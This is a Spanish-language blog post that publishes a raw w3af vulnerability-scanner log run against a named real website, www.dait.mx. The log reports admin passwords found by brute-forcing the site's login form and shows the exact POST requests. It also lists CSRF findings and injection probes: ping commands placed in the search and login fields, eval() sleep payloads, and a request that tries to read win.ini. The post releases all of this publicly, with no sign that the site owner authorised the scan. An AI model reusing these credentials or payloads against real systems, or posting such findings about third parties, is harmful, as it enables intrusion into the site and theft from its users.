Saludos Mundo Libre.
Vulnerabilidad en www.dait.mx/index.php/customer/account/login/
[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.collectCookies
[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Mon 06 Jun 2011 08:59:17 PM CDT] Auto-enabling plugin: grep.error500
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.getMails
[Mon 06 Jun 2011 08:59:18 PM CDT] Auto-enabling plugin: grep.lang
[Mon 06 Jun 2011 08:59:22 PM CDT] The server header for the remote web server is: "Apache". This information was found in the request with id 943.
[Mon 06 Jun 2011 08:59:22 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.17". This information was found in the request with id 944.
[Mon 06 Jun 2011 08:59:35 PM CDT] Starting formAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:35 PM CDT] No password profiling information collected, please try to enable webSpider plugin and try again.
[Mon 06 Jun 2011 08:59:41 PM CDT] Found a form login. The action of the form is: "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:41 PM CDT] The username field to be used is: "login[username]".
[Mon 06 Jun 2011 08:59:41 PM CDT] The password field to be used is: "login[password]".
[Mon 06 Jun 2011 08:59:41 PM CDT] Starting form authentication bruteforce on URL: "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:42 PM CDT] localCache.py : Could not open cache for request.
[Mon 06 Jun 2011 08:59:46 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.
[Mon 06 Jun 2011 08:59:47 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 995.
[Mon 06 Jun 2011 08:59:50 PM CDT] Finished bruteforcing "http://www.dait.mx/index.php/customer/account/loginPost/".
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting basicAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting formAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Starting basicAuthBrute plugin execution.
[Mon 06 Jun 2011 08:59:50 PM CDT] Found 4 URLs and 5 different points of injection.
[Mon 06 Jun 2011 08:59:50 PM CDT] The list of URLs is:
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/login/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/newsletter/subscriber/new/
[Mon 06 Jun 2011 08:59:50 PM CDT] The list of fuzzable requests is:
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/ | Method: GET | Parameters: (q="")
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/login/ | Method: GET
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/ | Method: GET
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/customer/account/loginPost/ | Method: POST | Parameters: (login[username]="", login[password]="")
[Mon 06 Jun 2011 08:59:50 PM CDT] - http://www.dait.mx/index.php/newsletter/subscriber/new/ | Method: POST | Parameters: (email="")
[Mon 06 Jun 2011 09:00:00 PM CDT] The web application sent a persistent cookie.
[Mon 06 Jun 2011 09:00:00 PM CDT] The following scripts are vulnerable to a trivial form of XSRF:
[Mon 06 Jun 2011 09:00:00 PM CDT] - http://www.dait.mx/index.php/catalogsearch/result/
[Mon 06 Jun 2011 09:00:00 PM CDT] The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):
[Mon 06 Jun 2011 09:00:00 PM CDT] - The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: http://www.dait.mx/index.php/catalogsearch/result/ is vulnerable to cross site request forgery.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
[Mon 06 Jun 2011 09:01:02 PM CDT] Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.
[Mon 06 Jun 2011 09:01:02 PM CDT] "x-powered-by" header for this HTTP server is: "PHP/5.2.17". This information was found in the request with id 944.
[Mon 06 Jun 2011 09:01:02 PM CDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 946 and 947.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:27 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 949.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:30 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 950.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:31 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 951.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/login/_vti_inf.html" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:33 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 952.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/customer/account/loginPost/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:52 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1003.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/newsletter/subscriber/new/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 02:59:56 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1005.
[Mon 06 Jun 2011 09:01:02 PM CDT] The URL: "http://www.dait.mx/index.php/catalogsearch/result/" sent the cookie: "frontend=0uaf1j7r9fmegqckter9dttvu1; expires=Tue, 07-Jun-2011 03:00:01 GMT; path=/; domain=www.dait.mx; httponly". This information was found in the request with id 1009.
formAuthBrute:auth:Guessable credentials
Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/55555. This vulnerability was found in the request with id 962.
POST http://www.dait.mx/index.php/customer/account/loginPost/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Content-type: application/x-www-form-urlencoded
login%5Busername%5D=admin&login%5Bpassword%5D=55555
Found authentication credentials to: "http://www.dait.mx/index.php/customer/account/loginPost/". A correct user and password combination is: admin/4cc0un7. This vulnerability was found in the request with id 995.
xsrf:get_xsrf:Cross site request forgery vulnerability
The URL: http://www.dait.mx/index.php/catalogsearch/result/ is vulnerable to cross site request forgery.
post_xsrf:Cross site site request forgery vulnerability
The URL: http://www.dait.mx/index.php/newsletter/subscriber/new/ is vulnerable to cross site request forgery. It allows the attacker to exchange the method from POST to GET when sending data to the server.
osCommanding:Possible OS commanding vulnerability
A possible OS Commanding was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=ping+-n+3+localhost".Please review manually. This information was found in the request with id 1227.
GET http://www.dait.mx/index.php/catalogsearch/result/?q=ping+-n+3+localhost HTTP/1.1
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
A possible OS Commanding was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=ping+-c+9+localhost".Please review manually. This information was found in the request with id 1229.
A possible OS Commanding was found at: "http://www.dait.mx/index.php/customer/account/loginPost/", using HTTP method POST. The sent post-data was: "login%5Busername%5D=/usr/sbin/ping+-s+localhost+1000+10+&login%5Bpassword%5D=FrAmE30.". The modified parameter was "login[username]".Please review manually. This information was found in the request with id 1263.
eval:eval:eval()input injection vulnerability
eval() input injection was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 1494.
GET http://www.dait.mx/index.php/catalogsearch/result/?q=import+time%3Btime.sleep(9)%3B HTTP/1.1
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
eval() input injection was found at: "http://www.dait.mx/index.php/catalogsearch/result/", using HTTP method GET. The sent data was: "q=sleep(9)%3B". . Please review manually. This information was found in the request with id 1495.
eval() input injection was found at: "http://www.dait.mx/index.php/customer/account/loginPost/", using HTTP method POST. The sent post-data was: "login%5Busername%5D=Thread.Sleep(9000)%3B&login%5Bpassword%5D=FrAmE30.". The modified parameter was "login[username]". . Please review manually. This information was found in the request with id 1533.
error500:error500:Unhandled error in web application
An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1320.
An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1323.
An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1321.
An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1324.
An unidentified web application error (HTTP response code 500) was found at: "http://www.dait.mx/index.php/customer/account/loginPost/". Enable all plugins and try again, if the vulnerability still is not identified, please verify mannually and report it to the w3af developers. This vulnerability was found in the request with id 1325.
POST http://www.dait.mx/index.php/customer/account/loginPost/ HTTP/1.1
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Host: www.dait.mx
Cookie: path=/; domain=www.dait.mx; expires=Tue, 07-Jun-2011 02:59:19 GMT; frontend=0uaf1j7r9fmegqckter9dttvu1;
Content-type: application/x-www-form-urlencoded
login%5Busername%5D=John&login%5Bpassword%5D=%3Btype+%25SYSTEMROOT%25%5Cwin.ini
Hay Se Las dejo.
Saludos Mundo libre.
No hay comentarios:
Publicar un comentario